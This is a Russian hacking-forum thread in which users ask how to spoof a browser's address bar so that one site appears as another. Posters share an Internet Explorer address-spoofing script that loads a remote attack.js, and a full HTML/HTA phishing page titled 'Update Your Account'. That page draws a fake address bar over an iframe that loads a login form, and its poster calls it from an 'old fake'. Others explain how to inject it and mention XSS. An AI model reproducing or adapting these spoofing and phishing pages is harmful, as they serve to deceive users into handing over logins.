Ест сайт xxx.ru как сделать, чтобы при заходе на него в адресной строке отображалось yyy.ru?

hosts или редирект, смотря что тебе надо

всмысле что надо?

мне нужна подмена адреса

слышал про такой скрипт, но никогда невидел, мне кажеться это уязвимость какого-нибудь Ie

WINDOWS\system32\drivers\etc\hosts

для ИЕ сплоит где-то видел, который подменяет адрес сайта. Даже видео по его использованию смотрел давно ещё...то ли на ачате оно есть то ли на веб-хаке

а если тебе надо чтобы при наведении на ссылку отображался один сайт, а ссылка вела на другой, то это жаба-скрипт, он есть в полезных скриптах кажется.

page.html
<html><body onunload="entrapment(1)"><script src="attack.js"></script>
<font face="arial">
<h1><font color="teal">Произведена спуфинг-атака</font><hr></h1>
<p>


attack.js

var noentrap = 0;

function entrapment(entcount) {
if (noentrap) return true;
entcount++;
document.open();
document.write('<html><body onunload="entrapment(' + entcount + ')">' +
'<scr' + 'ipt src="http://www.securitylab.ru/_exploits/2007/02/attack.js"></scr' + 'ipt>' +
'<font face="arial">' +
'<h1><font color="teal">Произведена спуфинг-атака</font><hr></h1><p>');

document.close();

}
;)

http://www.securitylab.ru/_exploits/2007/02/attack.js

404 File Not Found

Вот скрипт со старого фейка, давным давно работал хорошо :)


<title>site.com - Update Your Account</title>
<SCRIPT language=JavaScript1.2>
top.window.moveTo(0,0);

if (document.all) {

top.window.resizeTo(screen.availWidth,screen.avail Height);

}

else if (document.layers||document.getElementById) {

if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){

top.window.outerHeight = screen.availHeight;

top.window.outerWidth = screen.availWidth;

}

}


</SCRIPT>

<META http-equiv=Content-Type
content="text/html; charset=windows-1252">
<HTA:APPLICATION id=oHTA
WINDOWSTATE="normal" SYSMENU="yes" SINGLEINSTANCE="yes" SHOWINTASKBAR="yes"
SELECTION="yes" SCROLLFLAT="yes" SCROLL="no" NAVIGABLE="yes" MINIMIZEBUTTON="no"
MAXIMIZEBUTTON="no" INNERBORDER="yes" ICON="yes" CONTEXTMENU="no" CAPTION="yes"
BORDERSTYLE="normal" BORDER="thin" APPLICATIONNAME="AmPost" VERSION="1.0" />
<STYLE>BODY {
BORDER-RIGHT: medium none; BORDER-TOP: medium none; FONT-SIZE: 8pt; MARGIN: 0px; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none; FONT-FAMILY: Arial; BACKGROUND-COLOR: buttonface
}
TD {
FONT-SIZE: 8pt
}
.indent {
LEFT: auto; TEXT-INDENT: 15pt; WHITE-SPACE: normal; TEXT-ALIGN: left
}
.size {
WIDTH: 100%
}
</STYLE>

<SCRIPT type=text/javascript>
<!--
<!--
var history=new Array(16);
hpos=0;
function MM_checkBrowser(NSvers,NSpass,NSnoPass,IEvers,IEpa ss,IEnoPass,OBpass,URL,altURL) { //v3.0
var newURL='', verStr=navigator.appVersion, app=navigator.appName, version = parseFloat(verStr);
if (app.indexOf('Netscape') != -1) {
if (version >= NSvers) {if (NSpass>0) newURL=(NSpass==1)?URL:altURL;}
else {if (NSnoPass>0) newURL=(NSnoPass==1)?URL:altURL;}
} else if (app.indexOf('Microsoft') != -1) {
if (version >= IEvers || verStr.indexOf(IEvers) != -1)
{if (IEpass>0) newURL=(IEpass==1)?URL:altURL;}
else {if (IEnoPass>0) newURL=(IEnoPass==1)?URL:altURL;}
} else if (OBpass>0) newURL=(OBpass==1)?URL:altURL;
if (newURL) { window.location=unescape(newURL); document.MM_returnValue=false; }
}

function forward()
{
frames["newFr"].location.href=history[hpos];
}

function load()
{
l=frames["newFr"].location.href;
if (l.lastIndexOf("?")==(l.length-1)) l=l.substr(0,l.length-1);
history[hpos]=l;
hpos++;
hpos%=16;
}
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
function MM_displayStatusMsg(msgStr) { //v1.0
status=msgStr;
document.MM_returnValue = true;
}
function go()
{
a=document.all.newAddr.value;
if (a.indexOf("http://")!=0) a="http://"+a;
nav.action=a;
return true;
MM_swapImage('Image1','','go1click.gif');
MM_displayStatusMsg('Done');

}
// -->

function MM_showHideLayers() { //v3.0
var i,p,v,obj,args=MM_showHideLayers.arguments;
for (i=0; i<(args.length-2); i+=3) if ((obj=MM_findObj(args[i]))!=null) { v=args[i+2];
if (obj.style) { obj=obj.style; v=(v=='show')?'visible':(v='hide')?'hidden':v; }
obj.visibility=v; }
}
//-->
</SCRIPT>

<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
<BODY onmousedown="MM_showHideLayers('pop','','hide')"
onload="MM_preloadImages('pdownclick.gif');MM_checkBrowser (4.0,1,1,4.0,0,0,1,'login-submit.htm','login-submit.htm');return document.MM_returnValue"
onunload=;><SPAN class=" indent">
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR borderColor=#cccccc>
<TD>
<TABLE borderColor=#c0c0c0 cellSpacing=0 cellPadding=0 width="100%"
border=0>
<TBODY>
<TR>
<FORM name=nav onsubmit=go(); action=about:blank method=get
target=newFr>
<TD
style="PADDING-RIGHT: 1px; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; PADDING-TOP: 1px"
align=right width=3 height=22>
<P align=left><IMG height=18 src="sline.gif"
width=3 align=right border=0></P></TD>
<TD
style="BACKGROUND-POSITION: right 50%; BACKGROUND-IMAGE: url('addr.gif'); BACKGROUND-REPEAT: no-repeat"
width=34 height=22>
<P>&nbsp;</P></TD>
<TD
style="BACKGROUND-POSITION: left 50%; BACKGROUND-IMAGE: url('ress.gif'); BACKGROUND-REPEAT: no-repeat"
align=left width="81%" height=22>
<INPUT class=indent id=newAddr
style="BACKGROUND-POSITION: left top; FONT-SIZE: 8pt; BACKGROUND-IMAGE: url('ie2.gif'); WIDTH: 100%; BACKGROUND-REPEAT: no-repeat; HEIGHT: 22px"
size=40 value=" http://antichat.ru/" name=no> </TD>
<TD width=146 BACKGROUND-IMAGE: url('addr.gif'); BACKGROUND-REPEAT: no-repeat" height=22><A
onmousedown="MM_swapImage('Image2','','pdownclick.gif',1)"
style="CURSOR: default" onmouseout=MM_swapImgRestore()
href="login-submit.htm#"><IMG
onclick="MM_showHideLayers('pop','','show')" height=21
src="pdown.gif" width=17 border=0
name=Image2></A><A
onmousedown="MM_swapImage('Image1','','go1click.gif',1);MM_disp layStatusMsg('Done');return document.MM_returnValue"
onmouseover="MM_swapImage('Image1','','go1roll.gif',1);MM_displ ayStatusMsg('Done');return document.MM_returnValue"
onmouseout=MM_swapImgRestore() href="file:///E:/"><INPUT id=Image1
style="CURSOR: default" onclick=go() type=image height=22 width=49
src="go1.gif" border=0 name=image1>
</A></TD></FORM></TR>
<TR>
<TD width=798 bgColor=#000000 colSpan=4><IMG height=1
src="hide.htm" width=1 border=0></TD></TR>
<TR>
<TD width=798 bgColor=#ffffff colSpan=4><IMG height=1
src="hide.htm" width=1
border=0></TD></TR></TBODY></TABLE>
<DIV id=pop
style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 53px; VISIBILITY: hidden; BORDER-LEFT: #000000 1px; WIDTH: 81%; BORDER-BOTTOM: #000000 1px; POSITION: absolute; HEIGHT: 50px; BACKGROUND-COLOR: #999999; layer-background-color: #999999"><TEXTAREA class=size name=textfield rows=5 wrap=VIRTUAL cols=77></TEXTAREA>
</DIV></TD></TR>
<TR height="100%">
<TD vAlign=top><IFRAME id=newFr style="WIDTH: 100%; HEIGHT: 100%"
name=newFr src="login-submit.htm" onload=load()
application="no"> </IFRAME></TD></TR></TBODY></TABLE></SPAN></BODY></HTML>

script+images (http://www.sendspace.com/file/y1u6k2)

а как его впихивать??? мне что-то не доехало... обьясните если не трудно

Тут все на Js, впихиваешь на ту страницу, при заходе на которой и скрыв. реаль. урл.

http://www.securitylab.ru/_exploits/2007/02/attack.js

404 File Not Found
там урл замени на локальный. я когда себе эксплоит сливал, забыл сменить.

aka PSIH

Идея отличная :))), жаль только жабоскрипт бажный.

Тут все на Js, впихиваешь на ту страницу, при заходе на которой и скрыв. реаль. урл.

а что такое Js ??? поподробне нельзя , мы учимся токо!

Да не скрывает она не хрена урл....этот скрипт просто дописывает как бы адресную строку
http://i028.radikal.ru/0801/27/400c55791cac.jpg
плюс ко всему ИЕ блокирует это как загрузку активного содержимого...а чтоб на самом деле подменить адрес сайта как я уже писал есть сплоит для ИЕ и то если не ошибаюсь для 4-й версии.
Поэтому то что выложили это фигня на самом деле, развод для ламеров :)

Ещё где то тут пример видел с использованием onMouseover при XSS.

.:EnoT:.
на страрых браузерах работало хорошо, да я и сразу написал:

Вот скрипт со старого фейка, давным давно работал хорошо


p.s: ТС не написал под какой браузер ему нужно (версию)

Так что рабочего скрипта или сплойта нету под лису или ИЕ 6 или 7?

Бредовое предложение:
На сайте ууу.ру сделать айфрейм в котором будет отображатся сайт ааа.ру
Но это поможет если есть доступ к ууу.ру

gold-goblin, только это никому не нужно.

Омг =\ Без доступа к физ оболочке каждого браузера сабж - бред
Или опровергните мое имхо

найти XSS на сайте yyy.ru, далее все просто. Без XSS нчего нормального не получиться!

Доступ то есть.

XSS не имеет никакого прямого отношения к супуфинг атакам, зачастую и Js. В большинстве случаев основой для уязвимости служит некорректное отображение элементов, формирующих "адрес", на странице, либо ошибки в обработке адресной строки браузером. Стоит учитывать как ПО так и используемую версии с установленными расширениями.
Причем стоит понимать разницу между спуфингом адресной строки и отображаемого адреса в строке статуса.